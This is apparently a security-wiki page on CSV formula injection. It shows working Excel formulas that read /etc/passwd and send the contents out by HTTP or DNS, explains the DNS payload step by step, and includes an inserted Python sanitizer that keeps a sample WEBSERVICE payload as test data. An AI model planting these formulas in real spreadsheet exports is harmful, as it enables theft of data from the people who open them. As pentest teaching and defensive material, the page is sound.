If your **input** is being **reflected** inside **CSV file**s \(or any other file that is probably going to be opened by **Excel**\), you may be able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the Excel sheet.
{% hint style="danger" %}
Nowadays **Excel will alert** \(several times\) the **user when something is loaded from outside the Excel** in order to protect them from malicious actions. Therefore, special effort on social engineering must be applied to the final payload.
{% endhint %}
## Hyperlink
**The following example is very useful to exfiltrate content from the final Excel sheet and to perform requests to arbitrary locations. But it requires the user to click on the link \(and accept the warning prompts\).**
Example taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Let us assume an attack scenario involving the Student Record Management system of a school. The application allows teachers to enter details of students in the school. The attacker gets access to the application and wants all the teachers using the application to be compromised. So the attacker tries to perform a CSV injection attack through the web application.
The attacker needs to steal other students' details, so the attacker uses the Hyperlink formula and enters it while entering student details.
* Exfiltrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
* `'file:///etc/passwd'#$passwd.A19` – Will read the 19th line from the local /etc/passwd file
* `ENCODEURL('file:///etc/passwd'#$passwd.A19)` – URL encode the returned data
* `MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41)` – Similar to substring, read data from 1st character to 41st – a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* `SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")` – Replaces all instances of `%` \(the special character from URL encoding\) with a dash – this ensures that only valid DNS characters are used
* `CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<FQDN>")` – Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* `WEBSERVICE` – Will make a request for this non-existent DNS name, which we can then observe by parsing the logs \(or running tcpdump etc.\) on the authoritative DNS name server that we control
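
On the export side, the payloads above only work if the cell reaches the spreadsheet starting with a formula character. The following Python routine is an added example \(not from the original page or the cited article\) that neutralizes such cells with the single-quote prefix commonly recommended for CSV injection and reports which ones call the outbound functions named on this page. All function names, the sample rows and the `placeholder.example` host are constructed for illustration.

```python
import csv
import io
import re

# Leading characters that make a spreadsheet evaluate a cell as a formula.
TRIGGERS = ("=", "+", "-", "@")
# Plain signed numbers such as "-5" are data, not formulas.
NUMERIC = re.compile(r"[+-]?\d+(\.\d+)?")
# Functions named on this page that reach outside the sheet.
NETWORK_FUNCS = re.compile(r"\b(WEBSERVICE|HYPERLINK|IMPORTXML)\s*\(", re.I)

# Constructed sample input; placeholder.example is not a real host.
SAMPLE_ROWS = [
    ["name", "grade", "note"],
    ["Alice", "-5", "ok"],
    ["Bob", "90", '=WEBSERVICE(CONCATENATE("http://placeholder.example/",A1))'],
    ["Carol", "88", "  =1+1"],
]

def is_formula(value: str) -> bool:
    """True if a spreadsheet would evaluate the cell instead of showing it."""
    if NUMERIC.fullmatch(value.strip()):
        return False
    # Tab / carriage return prefixes and leading spaces are common filter bypasses.
    return value.startswith(("\t", "\r")) or value.lstrip().startswith(TRIGGERS)

def neutralize(value: str) -> str:
    """Prefix a single quote so the cell is rendered as text."""
    return "'" + value if is_formula(value) else value

def export_rows(rows):
    """Return (csv_text, findings); findings are (row, col, outbound_functions)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)  # also escapes embedded quotes
    findings = []
    for r, row in enumerate(rows):
        safe = []
        for c, cell in enumerate(row):
            cell = str(cell)
            if is_formula(cell):
                funcs = sorted({f.upper() for f in NETWORK_FUNCS.findall(cell)})
                findings.append((r, c, funcs))
            safe.append(neutralize(cell))
        writer.writerow(safe)
    return buf.getvalue(), findings

if __name__ == "__main__":
    text, findings = export_rows(SAMPLE_ROWS)
    print(text)
    print(findings)
```

The `findings` list is worth logging server-side: a stored value that begins with a formula character and names an outbound function is a strong signal that someone is probing the export feature.
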
## Google Sheets OOB Data Exfiltration
Firstly, let’s introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```text
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.